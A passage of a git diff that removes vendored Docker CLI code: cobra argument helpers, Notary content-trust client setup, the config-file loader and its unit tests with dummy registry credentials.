-			cmd.Short,
-		)
-	}
-}
-
-// RequiresRangeArgs returns an error if there is not at least min args and at most max args
-func RequiresRangeArgs(min int, max int) cobra.PositionalArgs {
-	return func(cmd *cobra.Command, args []string) error {
-		if len(args) >= min && len(args) <= max {
-			return nil
-		}
-		return fmt.Errorf(
-			"\"%s\" requires at least %d and at most %d argument(s).\nSee '%s --help'.\n\nUsage:  %s\n\n%s",
-			cmd.CommandPath(),
-			min,
-			max,
-			cmd.CommandPath(),
-			cmd.UseLine(),
-			cmd.Short,
-		)
-	}
-}
-
-// ExactArgs returns an error if there is not the exact number of args
-func ExactArgs(number int) cobra.PositionalArgs {
-	return func(cmd *cobra.Command, args []string) error {
-		if len(args) == number {
-			return nil
-		}
-		return fmt.Errorf(
-			"\"%s\" requires exactly %d argument(s).\nSee '%s --help'.\n\nUsage:  %s\n\n%s",
-			cmd.CommandPath(),
-			number,
-			cmd.CommandPath(),
-			cmd.UseLine(),
-			cmd.Short,
-		)
-	}
-}
diff --git a/vendor/github.com/docker/docker/cli/trust/trust.go b/vendor/github.com/docker/docker/cli/trust/trust.go
deleted file mode 100644
index 51914f74b0..0000000000
--- a/vendor/github.com/docker/docker/cli/trust/trust.go
+++ /dev/null
@@ -1,232 +0,0 @@
-package trust
-
-import (
-	"encoding/json"
-	"fmt"
-	"net"
-	"net/http"
-	"net/url"
-	"os"
-	"path"
-	"path/filepath"
-	"time"
-
-	"github.com/Sirupsen/logrus"
-	"github.com/docker/distribution/registry/client/auth"
-	"github.com/docker/distribution/registry/client/auth/challenge"
-	"github.com/docker/distribution/registry/client/transport"
-	"github.com/docker/docker/api/types"
-	registrytypes "github.com/docker/docker/api/types/registry"
-	"github.com/docker/docker/cli/command"
-	"github.com/docker/docker/cliconfig"
-	"github.com/docker/docker/registry"
-	"github.com/docker/go-connections/tlsconfig"
-	"github.com/docker/notary"
-	"github.com/docker/notary/client"
-	"github.com/docker/notary/passphrase"
-	"github.com/docker/notary/storage"
-	"github.com/docker/notary/trustmanager"
-	"github.com/docker/notary/trustpinning"
-	"github.com/docker/notary/tuf/data"
-	"github.com/docker/notary/tuf/signed"
-)
-
-var (
-	// ReleasesRole is the role named "releases"
-	ReleasesRole = path.Join(data.CanonicalTargetsRole, "releases")
-)
-
-func trustDirectory() string {
-	return filepath.Join(cliconfig.ConfigDir(), "trust")
-}
-
-// certificateDirectory returns the directory containing
-// TLS certificates for the given server. An error is
-// returned if there was an error parsing the server string.
-func certificateDirectory(server string) (string, error) {
-	u, err := url.Parse(server)
-	if err != nil {
-		return "", err
-	}
-
-	return filepath.Join(cliconfig.ConfigDir(), "tls", u.Host), nil
-}
-
-// Server returns the base URL for the trust server.
-func Server(index *registrytypes.IndexInfo) (string, error) {
-	if s := os.Getenv("DOCKER_CONTENT_TRUST_SERVER"); s != "" {
-		urlObj, err := url.Parse(s)
-		if err != nil || urlObj.Scheme != "https" {
-			return "", fmt.Errorf("valid https URL required for trust server, got %s", s)
-		}
-
-		return s, nil
-	}
-	if index.Official {
-		return registry.NotaryServer, nil
-	}
-	return "https://" + index.Name, nil
-}
-
-type simpleCredentialStore struct {
-	auth types.AuthConfig
-}
-
-func (scs simpleCredentialStore) Basic(u *url.URL) (string, string) {
-	return scs.auth.Username, scs.auth.Password
-}
-
-func (scs simpleCredentialStore) RefreshToken(u *url.URL, service string) string {
-	return scs.auth.IdentityToken
-}
-
-func (scs simpleCredentialStore) SetRefreshToken(*url.URL, string, string) {
-}
-
-// GetNotaryRepository returns a NotaryRepository which stores all the
-// information needed to operate on a notary repository.
-// It creates an HTTP transport providing authentication support.
-func GetNotaryRepository(streams command.Streams, repoInfo *registry.RepositoryInfo, authConfig types.AuthConfig, actions ...string) (*client.NotaryRepository, error) {
-	server, err := Server(repoInfo.Index)
-	if err != nil {
-		return nil, err
-	}
-
-	var cfg = tlsconfig.ClientDefault()
-	cfg.InsecureSkipVerify = !repoInfo.Index.Secure
-
-	// Get certificate base directory
-	certDir, err := certificateDirectory(server)
-	if err != nil {
-		return nil, err
-	}
-	logrus.Debugf("reading certificate directory: %s", certDir)
-
-	if err := registry.ReadCertsDirectory(cfg, certDir); err != nil {
-		return nil, err
-	}
-
-	base := &http.Transport{
-		Proxy: http.ProxyFromEnvironment,
-		Dial: (&net.Dialer{
-			Timeout:   30 * time.Second,
-			KeepAlive: 30 * time.Second,
-			DualStack: true,
-		}).Dial,
-		TLSHandshakeTimeout: 10 * time.Second,
-		TLSClientConfig:     cfg,
-		DisableKeepAlives:   true,
-	}
-
-	// Skip configuration headers since request is not going to Docker daemon
-	modifiers := registry.DockerHeaders(command.UserAgent(), http.Header{})
-	authTransport := transport.NewTransport(base, modifiers...)
-	pingClient := &http.Client{
-		Transport: authTransport,
-		Timeout:   5 * time.Second,
-	}
-	endpointStr := server + "/v2/"
-	req, err := http.NewRequest("GET", endpointStr, nil)
-	if err != nil {
-		return nil, err
-	}
-
-	challengeManager := challenge.NewSimpleManager()
-
-	resp, err := pingClient.Do(req)
-	if err != nil {
-		// Ignore error on ping to operate in offline mode
-		logrus.Debugf("Error pinging notary server %q: %s", endpointStr, err)
-	} else {
-		defer resp.Body.Close()
-
-		// Add response to the challenge manager to parse out
-		// authentication header and register authentication method
-		if err := challengeManager.AddResponse(resp); err != nil {
-			return nil, err
-		}
-	}
-
-	scope := auth.RepositoryScope{
-		Repository: repoInfo.FullName(),
-		Actions:    actions,
-		Class:      repoInfo.Class,
-	}
-	creds := simpleCredentialStore{auth: authConfig}
-	tokenHandlerOptions := auth.TokenHandlerOptions{
-		Transport:   authTransport,
-		Credentials: creds,
-		Scopes:      []auth.Scope{scope},
-		ClientID:    registry.AuthClientID,
-	}
-	tokenHandler := auth.NewTokenHandlerWithOptions(tokenHandlerOptions)
-	basicHandler := auth.NewBasicHandler(creds)
-	modifiers = append(modifiers, transport.RequestModifier(auth.NewAuthorizer(challengeManager, tokenHandler, basicHandler)))
-	tr := transport.NewTransport(base, modifiers...)
-
-	return client.NewNotaryRepository(
-		trustDirectory(),
-		repoInfo.FullName(),
-		server,
-		tr,
-		getPassphraseRetriever(streams),
-		trustpinning.TrustPinConfig{})
-}
-
-func getPassphraseRetriever(streams command.Streams) notary.PassRetriever {
-	aliasMap := map[string]string{
-		"root":     "root",
-		"snapshot": "repository",
-		"targets":  "repository",
-		"default":  "repository",
-	}
-	baseRetriever := passphrase.PromptRetrieverWithInOut(streams.In(), streams.Out(), aliasMap)
-	env := map[string]string{
-		"root":     os.Getenv("DOCKER_CONTENT_TRUST_ROOT_PASSPHRASE"),
-		"snapshot": os.Getenv("DOCKER_CONTENT_TRUST_REPOSITORY_PASSPHRASE"),
-		"targets":  os.Getenv("DOCKER_CONTENT_TRUST_REPOSITORY_PASSPHRASE"),
-		"default":  os.Getenv("DOCKER_CONTENT_TRUST_REPOSITORY_PASSPHRASE"),
-	}
-
-	return func(keyName string, alias string, createNew bool, numAttempts int) (string, bool, error) {
-		if v := env[alias]; v != "" {
-			return v, numAttempts > 1, nil
-		}
-		// For non-root roles, we can also try the "default" alias if it is specified
-		if v := env["default"]; v != "" && alias != data.CanonicalRootRole {
-			return v, numAttempts > 1, nil
-		}
-		return baseRetriever(keyName, alias, createNew, numAttempts)
-	}
-}
-
-// NotaryError formats an error message received from the notary service
-func NotaryError(repoName string, err error) error {
-	switch err.(type) {
-	case *json.SyntaxError:
-		logrus.Debugf("Notary syntax error: %s", err)
-		return fmt.Errorf("Error: no trust data available for remote repository %s. Try running notary server and setting DOCKER_CONTENT_TRUST_SERVER to its HTTPS address?", repoName)
-	case signed.ErrExpired:
-		return fmt.Errorf("Error: remote repository %s out-of-date: %v", repoName, err)
-	case trustmanager.ErrKeyNotFound:
-		return fmt.Errorf("Error: signing keys for remote repository %s not found: %v", repoName, err)
-	case storage.NetworkError:
-		return fmt.Errorf("Error: error contacting notary server: %v", err)
-	case storage.ErrMetaNotFound:
-		return fmt.Errorf("Error: trust data missing for remote repository %s or remote repository not found: %v", repoName, err)
-	case trustpinning.ErrRootRotationFail, trustpinning.ErrValidationFail, signed.ErrInvalidKeyType:
-		return fmt.Errorf("Warning: potential malicious behavior - trust data mismatch for remote repository %s: %v", repoName, err)
-	case signed.ErrNoKeys:
-		return fmt.Errorf("Error: could not find signing keys for remote repository %s, or could not decrypt signing key: %v", repoName, err)
-	case signed.ErrLowVersion:
-		return fmt.Errorf("Warning: potential malicious behavior - trust data version is lower than expected for remote repository %s: %v", repoName, err)
-	case signed.ErrRoleThreshold:
-		return fmt.Errorf("Warning: potential malicious behavior - trust data has insufficient signatures for remote repository %s: %v", repoName, err)
-	case client.ErrRepositoryNotExist:
-		return fmt.Errorf("Error: remote trust data does not exist for %s: %v", repoName, err)
-	case signed.ErrInsufficientSignatures:
-		return fmt.Errorf("Error: could not produce valid signature for %s.  If Yubikey was used, was touch input provided?: %v", repoName, err)
-	}
-
-	return err
-}
diff --git a/vendor/github.com/docker/docker/cliconfig/config.go b/vendor/github.com/docker/docker/cliconfig/config.go
deleted file mode 100644
index d81bf86b7a..0000000000
--- a/vendor/github.com/docker/docker/cliconfig/config.go
+++ /dev/null
@@ -1,120 +0,0 @@
-package cliconfig
-
-import (
-	"fmt"
-	"io"
-	"os"
-	"path/filepath"
-
-	"github.com/docker/docker/api/types"
-	"github.com/docker/docker/cliconfig/configfile"
-	"github.com/docker/docker/pkg/homedir"
-)
-
-const (
-	// ConfigFileName is the name of config file
-	ConfigFileName = "config.json"
-	configFileDir  = ".docker"
-	oldConfigfile  = ".dockercfg"
-)
-
-var (
-	configDir = os.Getenv("DOCKER_CONFIG")
-)
-
-func init() {
-	if configDir == "" {
-		configDir = filepath.Join(homedir.Get(), configFileDir)
-	}
-}
-
-// ConfigDir returns the directory the configuration file is stored in
-func ConfigDir() string {
-	return configDir
-}
-
-// SetConfigDir sets the directory the configuration file is stored in
-func SetConfigDir(dir string) {
-	configDir = dir
-}
-
-// NewConfigFile initializes an empty configuration file for the given filename 'fn'
-func NewConfigFile(fn string) *configfile.ConfigFile {
-	return &configfile.ConfigFile{
-		AuthConfigs: make(map[string]types.AuthConfig),
-		HTTPHeaders: make(map[string]string),
-		Filename:    fn,
-	}
-}
-
-// LegacyLoadFromReader is a convenience function that creates a ConfigFile object from
-// a non-nested reader
-func LegacyLoadFromReader(configData io.Reader) (*configfile.ConfigFile, error) {
-	configFile := configfile.ConfigFile{
-		AuthConfigs: make(map[string]types.AuthConfig),
-	}
-	err := configFile.LegacyLoadFromReader(configData)
-	return &configFile, err
-}
-
-// LoadFromReader is a convenience function that creates a ConfigFile object from
-// a reader
-func LoadFromReader(configData io.Reader) (*configfile.ConfigFile, error) {
-	configFile := configfile.ConfigFile{
-		AuthConfigs: make(map[string]types.AuthConfig),
-	}
-	err := configFile.LoadFromReader(configData)
-	return &configFile, err
-}
-
-// Load reads the configuration files in the given directory, and sets up
-// the auth config information and returns values.
-// FIXME: use the internal golang config parser
-func Load(configDir string) (*configfile.ConfigFile, error) {
-	if configDir == "" {
-		configDir = ConfigDir()
-	}
-
-	configFile := configfile.ConfigFile{
-		AuthConfigs: make(map[string]types.AuthConfig),
-		Filename:    filepath.Join(configDir, ConfigFileName),
-	}
-
-	// Try happy path first - latest config file
-	if _, err := os.Stat(configFile.Filename); err == nil {
-		file, err := os.Open(configFile.Filename)
-		if err != nil {
-			return &configFile, fmt.Errorf("%s - %v", configFile.Filename, err)
-		}
-		defer file.Close()
-		err = configFile.LoadFromReader(file)
-		if err != nil {
-			err = fmt.Errorf("%s - %v", configFile.Filename, err)
-		}
-		return &configFile, err
-	} else if !os.IsNotExist(err) {
-		// if file is there but we can't stat it for any reason other
-		// than it doesn't exist then stop
-		return &configFile, fmt.Errorf("%s - %v", configFile.Filename, err)
-	}
-
-	// Can't find latest config file so check for the old one
-	confFile := filepath.Join(homedir.Get(), oldConfigfile)
-	if _, err := os.Stat(confFile); err != nil {
-		return &configFile, nil //missing file is not an error
-	}
-	file, err := os.Open(confFile)
-	if err != nil {
-		return &configFile, fmt.Errorf("%s - %v", confFile, err)
-	}
-	defer file.Close()
-	err = configFile.LegacyLoadFromReader(file)
-	if err != nil {
-		return &configFile, fmt.Errorf("%s - %v", confFile, err)
-	}
-
-	if configFile.HTTPHeaders == nil {
-		configFile.HTTPHeaders = map[string]string{}
-	}
-	return &configFile, nil
-}
diff --git a/vendor/github.com/docker/docker/cliconfig/config_test.go b/vendor/github.com/docker/docker/cliconfig/config_test.go
deleted file mode 100644
index d8a099ab58..0000000000
--- a/vendor/github.com/docker/docker/cliconfig/config_test.go
+++ /dev/null
@@ -1,621 +0,0 @@
-package cliconfig
-
-import (
-	"io/ioutil"
-	"os"
-	"path/filepath"
-	"strings"
-	"testing"
-
-	"github.com/docker/docker/cliconfig/configfile"
-	"github.com/docker/docker/pkg/homedir"
-)
-
-func TestEmptyConfigDir(t *testing.T) {
-	tmpHome, err := ioutil.TempDir("", "config-test")
-	if err != nil {
-		t.Fatal(err)
-	}
-	defer os.RemoveAll(tmpHome)
-
-	SetConfigDir(tmpHome)
-
-	config, err := Load("")
-	if err != nil {
-		t.Fatalf("Failed loading on empty config dir: %q", err)
-	}
-
-	expectedConfigFilename := filepath.Join(tmpHome, ConfigFileName)
-	if config.Filename != expectedConfigFilename {
-		t.Fatalf("Expected config filename %s, got %s", expectedConfigFilename, config.Filename)
-	}
-
-	// Now save it and make sure it shows up in new form
-	saveConfigAndValidateNewFormat(t, config, tmpHome)
-}
-
-func TestMissingFile(t *testing.T) {
-	tmpHome, err := ioutil.TempDir("", "config-test")
-	if err != nil {
-		t.Fatal(err)
-	}
-	defer os.RemoveAll(tmpHome)
-
-	config, err := Load(tmpHome)
-	if err != nil {
-		t.Fatalf("Failed loading on missing file: %q", err)
-	}
-
-	// Now save it and make sure it shows up in new form
-	saveConfigAndValidateNewFormat(t, config, tmpHome)
-}
-
-func TestSaveFileToDirs(t *testing.T) {
-	tmpHome, err := ioutil.TempDir("", "config-test")
-	if err != nil {
-		t.Fatal(err)
-	}
-	defer os.RemoveAll(tmpHome)
-
-	tmpHome += "/.docker"
-
-	config, err := Load(tmpHome)
-	if err != nil {
-		t.Fatalf("Failed loading on missing file: %q", err)
-	}
-
-	// Now save it and make sure it shows up in new form
-	saveConfigAndValidateNewFormat(t, config, tmpHome)
-}
-
-func TestEmptyFile(t *testing.T) {
-	tmpHome, err := ioutil.TempDir("", "config-test")
-	if err != nil {
-		t.Fatal(err)
-	}
-	defer os.RemoveAll(tmpHome)
-
-	fn := filepath.Join(tmpHome, ConfigFileName)
-	if err := ioutil.WriteFile(fn, []byte(""), 0600); err != nil {
-		t.Fatal(err)
-	}
-
-	_, err = Load(tmpHome)
-	if err == nil {
-		t.Fatalf("Was supposed to fail")
-	}
-}
-
-func TestEmptyJSON(t *testing.T) {
-	tmpHome, err := ioutil.TempDir("", "config-test")
-	if err != nil {
-		t.Fatal(err)
-	}
-	defer os.RemoveAll(tmpHome)
-
-	fn := filepath.Join(tmpHome, ConfigFileName)
-	if err := ioutil.WriteFile(fn, []byte("{}"), 0600); err != nil {
-		t.Fatal(err)
-	}
-
-	config, err := Load(tmpHome)
-	if err != nil {
-		t.Fatalf("Failed loading on empty json file: %q", err)
-	}
-
-	// Now save it and make sure it shows up in new form
-	saveConfigAndValidateNewFormat(t, config, tmpHome)
-}
-
-func TestOldInvalidsAuth(t *testing.T) {
-	invalids := map[string]string{
-		`username = test`: "The Auth config file is empty",
-		`username
-password`: "Invalid Auth config file",
-		`username = test
-email`: "Invalid auth configuration file",
-	}
-
-	tmpHome, err := ioutil.TempDir("", "config-test")
-	if err != nil {
-		t.Fatal(err)
-	}
-	defer os.RemoveAll(tmpHome)
-
-	homeKey := homedir.Key()
-	homeVal := homedir.Get()
-
-	defer func() { os.Setenv(homeKey, homeVal) }()
-	os.Setenv(homeKey, tmpHome)
-
-	for content, expectedError := range invalids {
-		fn := filepath.Join(tmpHome, oldConfigfile)
-		if err := ioutil.WriteFile(fn, []byte(content), 0600); err != nil {
-			t.Fatal(err)
-		}
-
-		config, err := Load(tmpHome)
-		// Use Contains instead of == since the file name will change each time
-		if err == nil || !strings.Contains(err.Error(), expectedError) {
-			t.Fatalf("Should have failed\nConfig: %v\nGot: %v\nExpected: %v", config, err, expectedError)
-		}
-
-	}
-}
-
-func TestOldValidAuth(t *testing.T) {
-	tmpHome, err := ioutil.TempDir("", "config-test")
-	if err != nil {
-		t.Fatal(err)
-	}
-	if err != nil {
-		t.Fatal(err)
-	}
-	defer os.RemoveAll(tmpHome)
-
-	homeKey := homedir.Key()
-	homeVal := homedir.Get()
-
-	defer func() { os.Setenv(homeKey, homeVal) }()
-	os.Setenv(homeKey, tmpHome)
-
-	fn := filepath.Join(tmpHome, oldConfigfile)
-	js := `username = am9lam9lOmhlbGxv
-	email = user@example.com`
-	if err := ioutil.WriteFile(fn, []byte(js), 0600); err != nil {
-		t.Fatal(err)
-	}
-
-	config, err := Load(tmpHome)
-	if err != nil {
-		t.Fatal(err)
-	}
-
-	// defaultIndexserver is https://index.docker.io/v1/
-	ac := config.AuthConfigs["https://index.docker.io/v1/"]
-	if ac.Username != "joejoe" || ac.Password != "hello" {
-		t.Fatalf("Missing data from parsing:\n%q", config)
-	}
-
-	// Now save it and make sure it shows up in new form
-	configStr := saveConfigAndValidateNewFormat(t, config, tmpHome)
-
-	expConfStr := `{
-	"auths": {
-		"https://index.docker.io/v1/": {
-			"auth": "am9lam9lOmhlbGxv"
-		}
-	}
-}`
-
-	if configStr != expConfStr {
-		t.Fatalf("Should have save in new form: \n%s\n not \n%s", configStr, expConfStr)
-	}
-}
-
-func TestOldJSONInvalid(t *testing.T) {
-	tmpHome, err := ioutil.TempDir("", "config-test")
-	if err != nil {
-		t.Fatal(err)
-	}
-	defer os.RemoveAll(tmpHome)
-
-	homeKey := homedir.Key()
-	homeVal := homedir.Get()
-
-	defer func() { os.Setenv(homeKey, homeVal) }()
-	os.Setenv(homeKey, tmpHome)
-
-	fn := filepath.Join(tmpHome, oldConfigfile)
-	js := `{"https://index.docker.io/v1/":{"auth":"test","email":"user@example.com"}}`
-	if err := ioutil.WriteFile(fn, []byte(js), 0600); err != nil {
-		t.Fatal(err)
-	}
-
-	config, err := Load(tmpHome)
-	// Use Contains instead of == since the file name will change each time
-	if err == nil || !strings.Contains(err.Error(), "Invalid auth configuration file") {
-		t.Fatalf("Expected an error got : %v, %v", config, err)
-	}
-}
-
-func TestOldJSON(t *testing.T) {
-	tmpHome, err := ioutil.TempDir("", "config-test")
-	if err != nil {
-		t.Fatal(err)
-	}
-	defer os.RemoveAll(tmpHome)
-
-	homeKey := homedir.Key()
-	homeVal := homedir.Get()
-
-	defer func() { os.Setenv(homeKey, homeVal) }()
-	os.Setenv(homeKey, tmpHome)
-
-	fn := filepath.Join(tmpHome, oldConfigfile)
-	js := `{"https://index.docker.io/v1/":{"auth":"am9lam9lOmhlbGxv","email":"user@example.com"}}`
-	if err := ioutil.WriteFile(fn, []byte(js), 0600); err != nil {
-		t.Fatal(err)
-	}
-
-	config, err := Load(tmpHome)
-	if err != nil {
-		t.Fatalf("Failed loading on empty json file: %q", err)
-	}
-
-	ac := config.AuthConfigs["https://index.docker.io/v1/"]
-	if ac.Username != "joejoe" || ac.Password != "hello" {
-		t.Fatalf("Missing data from parsing:\n%q", config)
-	}
-
-	// Now save it and make sure it shows up in new form
-	configStr := saveConfigAndValidateNewFormat(t, config, tmpHome)
-
-	expConfStr := `{
-	"auths": {
-		"https://index.docker.io/v1/": {
-			"auth": "am9lam9lOmhlbGxv",
-			"email": "user@example.com"
-		}
-	}
-}`
-
-	if configStr != expConfStr {
-		t.Fatalf("Should have save in new form: \n'%s'\n not \n'%s'\n", configStr, expConfStr)
-	}
-}
-
-func TestNewJSON(t *testing.T) {
-	tmpHome, err := ioutil.TempDir("", "config-test")
-	if err != nil {
-		t.Fatal(err)
-	}
-	defer os.RemoveAll(tmpHome)
-
-	fn := filepath.Join(tmpHome, ConfigFileName)
-	js := ` { "auths": { "https://index.docker.io/v1/": { "auth": "am9lam9lOmhlbGxv" } } }`
-	if err := ioutil.WriteFile(fn, []byte(js), 0600); err != nil {
-		t.Fatal(err)
-	}
-
-	config, err := Load(tmpHome)
-	if err != nil {
-		t.Fatalf("Failed loading on empty json file: %q", err)
-	}
-
-	ac := config.AuthConfigs["https://index.docker.io/v1/"]
-	if ac.Username != "joejoe" || ac.Password != "hello" {
-		t.Fatalf("Missing data from parsing:\n%q", config)
-	}
-
-	// Now save it and make sure it shows up in new form
-	configStr := saveConfigAndValidateNewFormat(t, config, tmpHome)
-
-	expConfStr := `{
-	"auths": {
-		"https://index.docker.io/v1/": {
-			"auth": "am9lam9lOmhlbGxv"
-		}
-	}
-}`
-
-	if configStr != expConfStr {
-		t.Fatalf("Should have save in new form: \n%s\n not \n%s", configStr, expConfStr)
-	}
-}
-
-func TestNewJSONNoEmail(t *testing.T) {
-	tmpHome, err := ioutil.TempDir("", "config-test")
-	if err != nil {
-		t.Fatal(err)
-	}
-	defer os.RemoveAll(tmpHome)
-
-	fn := filepath.Join(tmpHome, ConfigFileName)
-	js := ` { "auths": { "https://index.docker.io/v1/": { "auth": "am9lam9lOmhlbGxv" } } }`
-	if err := ioutil.WriteFile(fn, []byte(js), 0600); err != nil {
-		t.Fatal(err)
-	}
-
-	config, err := Load(tmpHome)
-	if err != nil {
-		t.Fatalf("Failed loading on empty json file: %q", err)
-	}
-
-	ac := config.AuthConfigs["https://index.docker.io/v1/"]
-	if ac.Username != "joejoe" || ac.Password != "hello" {
-		t.Fatalf("Missing data from parsing:\n%q", config)
-	}
-
-	// Now save it and make sure it shows up in new form
-	configStr := saveConfigAndValidateNewFormat(t, config, tmpHome)
-
-	expConfStr := `{
-	"auths": {
-		"https://index.docker.io/v1/": {
-			"auth": "am9lam9lOmhlbGxv"
-		}
-	}
-}`
-
-	if configStr != expConfStr {
-		t.Fatalf("Should have save in new form: \n%s\n not \n%s", configStr, expConfStr)
-	}
-}
-
-func TestJSONWithPsFormat(t *testing.T) {
-	tmpHome, err := ioutil.TempDir("", "config-test")
-	if err != nil {
-		t.Fatal(err)
-	}
-	defer os.RemoveAll(tmpHome)
-
-	fn := filepath.Join(tmpHome, ConfigFileName)
-	js := `{
-		"auths": { "https://index.docker.io/v1/": { "auth": "am9lam9lOmhlbGxv", "email": "user@example.com" } },
-		"psFormat": "table {{.ID}}\\t{{.Label \"com.docker.label.cpu\"}}"
-}`
-	if err := ioutil.WriteFile(fn, []byte(js), 0600); err != nil {
-		t.Fatal(err)
-	}
-
-	config, err := Load(tmpHome)
-	if err != nil {
-		t.Fatalf("Failed loading on empty json file: %q", err)
-	}
-
-	if config.PsFormat != `table {{.ID}}\t{{.Label "com.docker.label.cpu"}}` {
-		t.Fatalf("Unknown ps format: %s\n", config.PsFormat)
-	}
-
-	// Now save it and make sure it shows up in new form
-	configStr := saveConfigAndValidateNewFormat(t, config, tmpHome)
-	if !strings.Contains(configStr, `"psFormat":`) ||
-		!strings.Contains(configStr, "{{.ID}}") {
-		t.Fatalf("Should have save in new form: %s", configStr)
-	}
-}
-
-func TestJSONWithCredentialStore(t *testing.T) {
-	tmpHome, err := ioutil.TempDir("", "config-test")
-	if err != nil {
-		t.Fatal(err)
-	}
-	defer os.RemoveAll(tmpHome)
-
-	fn := filepath.Join(tmpHome, ConfigFileName)
-	js := `{
-		"auths": { "https://index.docker.io/v1/": { "auth": "am9lam9lOmhlbGxv", "email": "user@example.com" } },
-		"credsStore": "crazy-secure-storage"
-}`
-	if err := ioutil.WriteFile(fn, []byte(js), 0600); err != nil {
-		t.Fatal(err)
-	}
-
-	config, err := Load(tmpHome)
-	if err != nil {
-		t.Fatalf("Failed loading on empty json file: %q", err)
-	}
-
-	if config.CredentialsStore != "crazy-secure-storage" {
-		t.Fatalf("Unknown credential store: %s\n", config.CredentialsStore)
-	}
-
-	// Now save it and make sure it shows up in new form
-	configStr := saveConfigAndValidateNewFormat(t, config, tmpHome)
-	if !strings.Contains(configStr, `"credsStore":`) ||
-		!strings.Contains(configStr, "crazy-secure-storage") {
-		t.Fatalf("Should have save in new form: %s", configStr)
-	}
-}
-
-func TestJSONWithCredentialHelpers(t *testing.T) {
-	tmpHome, err := ioutil.TempDir("", "config-test")
-	if err != nil {
-		t.Fatal(err)
-	}
-	defer os.RemoveAll(tmpHome)
-
-	fn := filepath.Join(tmpHome, ConfigFileName)
-	js := `{
-		"auths": { "https://index.docker.io/v1/": { "auth": "am9lam9lOmhlbGxv", "email": "user@example.com" } },
-		"credHelpers": { "images.io": "images-io", "containers.com": "crazy-secure-storage" }
-}`
-	if err := ioutil.WriteFile(fn, []byte(js), 0600); err != nil {
-		t.Fatal(err)
-	}
-
-	config, err := Load(tmpHome)
-	if err != nil {
-		t.Fatalf("Failed loading on empty json file: %q", err)
-	}
-
-	if config.CredentialHelpers == nil {
-		t.Fatal("config.CredentialHelpers was nil")
-	} else if config.CredentialHelpers["images.io"] != "images-io" ||
-		config.CredentialHelpers["containers.com"] != "crazy-secure-storage" {
-		t.Fatalf("Credential helpers not deserialized properly: %v\n", config.CredentialHelpers)
-	}
-
-	// Now save it and make sure it shows up in new form
-	configStr := saveConfigAndValidateNewFormat(t, config, tmpHome)
-	if !strings.Contains(configStr, `"credHelpers":`) ||
-		!strings.Contains(configStr, "images.io") ||
-		!strings.Contains(configStr, "images-io") ||
-		!strings.Contains(configStr, "containers.com") ||
-		!strings.Contains(configStr, "crazy-secure-storage") {
-		t.Fatalf("Should have save in new form: %s", configStr)
-	}
-}
-
-// Save it and make sure it shows up in new form
-func saveConfigAndValidateNewFormat(t *testing.T, config *configfile.ConfigFile, homeFolder string) string {
-	if err := config.Save(); err != nil {
-		t.Fatalf("Failed to save: %q", err)
-	}
-
-	buf, err := ioutil.ReadFile(filepath.Join(homeFolder, ConfigFileName))
-	if err != nil {
-		t.Fatal(err)
-	}
-	if !strings.Contains(string(buf), `"auths":`) {
-		t.Fatalf("Should have save in new form: %s", string(buf))
-	}
-	return string(buf)
-}
-
-func TestConfigDir(t *testing.T) {
-	tmpHome, err := ioutil.TempDir("", "config-test")
-	if err != nil {
-		t.Fatal(err)
-	}
-	defer os.RemoveAll(tmpHome)
-
-	if ConfigDir() == tmpHome {
-		t.Fatalf("Expected ConfigDir to be different than %s by default, but was the same", tmpHome)
-	}
-
-	// Update configDir
-	SetConfigDir(tmpHome)
-
-	if ConfigDir() != tmpHome {
-		t.Fatalf("Expected ConfigDir to %s, but was %s", tmpHome, ConfigDir())
-	}
-}
-
-func TestConfigFile(t *testing.T) {
-	configFilename := "configFilename"
-	configFile := NewConfigFile(configFilename)
-
-	if configFile.Filename != configFilename {
-		t.Fatalf("Expected %s, got %s", configFilename, configFile.Filename)
-	}
-}
-
-func TestJSONReaderNoFile(t *testing.T) {
-	js := ` { "auths": { "https://index.docker.io/v1/": { "auth": "am9lam9lOmhlbGxv", "email": "user@example.com" } } }`
-
-	config, err := LoadFromReader(strings.NewReader(js))
-	if err != nil {
-		t.Fatalf("Failed loading on empty json file: %q", err)
-	}
-
-	ac := config.AuthConfigs["https://index.docker.io/v1/"]
-	if ac.Username != "joejoe" || ac.Password != "hello" {
-		t.Fatalf("Missing data from parsing:\n%q", config)
-	}
-
-}
-
-func TestOldJSONReaderNoFile(t *testing.T) {
-	js := `{"https://index.docker.io/v1/":{"auth":"am9lam9lOmhlbGxv","email":"user@example.com"}}`
-
-	config, err := LegacyLoadFromReader(strings.NewReader(js))
-	if err != nil {
-		t.Fatalf("Failed loading on empty json file: %q", err)
-	}
-
-	ac := config.AuthConfigs["https://index.docker.io/v1/"]
-	if ac.Username != "joejoe" || ac.Password != "hello" {
-		t.Fatalf("Missing data from parsing:\n%q", config)
-	}
-}
-
-func TestJSONWithPsFormatNoFile(t *testing.T) {
-	js := `{
-		"auths": { "https://index.docker.io/v1/": { "auth": "am9lam9lOmhlbGxv", "email": "user@example.com" } },
-		"psFormat": "table {{.ID}}\\t{{.Label \"com.docker.label.cpu\"}}"
-}`
-	config, err := LoadFromReader(strings.NewReader(js))
-	if err != nil {
-		t.Fatalf("Failed loading on empty json file: %q", err)
-	}
-
-	if config.PsFormat != `table {{.ID}}\t{{.Label "com.docker.label.cpu"}}` {
-		t.Fatalf("Unknown ps format: %s\n", config.PsFormat)
-	}
-
-}
-
-func TestJSONSaveWithNoFile(t *testing.T) {
-	js := `{
-		"auths": { "https://index.docker.io/v1/": { "auth": "am9lam9lOmhlbGxv" } },
-		"psFormat": "table {{.ID}}\\t{{.Label \"com.docker.label.cpu\"}}"
-}`
-	config, err := LoadFromReader(strings.NewReader(js))
-	err = config.Save()
-	if err == nil {
-		t.Fatalf("Expected error. File should not have been able to save with no file name.")
-	}
-
-	tmpHome, err := ioutil.TempDir("", "config-test")
-	if err != nil {
-		t.Fatalf("Failed to create a temp dir: %q", err)
-	}
-	defer os.RemoveAll(tmpHome)
-
-	fn := filepath.Join(tmpHome, ConfigFileName)
-	f, _ := os.OpenFile(fn, os.O_WRONLY|os.O_CREATE|os.O_TRUNC, 0600)
-	defer f.Close()
-
-	err = config.SaveToWriter(f)
-	if err != nil {
-		t.Fatalf("Failed saving to file: %q", err)
-	}
-	buf, err := ioutil.ReadFile(filepath.Join(tmpHome, ConfigFileName))
-	if err != nil {
-		t.Fatal(err)
-	}
-	expConfStr := `{
-	"auths": {
-		"https://index.docker.io/v1/": {
-			"auth": "am9lam9lOmhlbGxv"
-		}
-	},
-	"psFormat": "table {{.ID}}\\t{{.Label \"com.docker.label.cpu\"}}"
-}`
-	if string(buf) != expConfStr {
-		t.Fatalf("Should have save in new form: \n%s\nnot \n%s", string(buf), expConfStr)
-	}
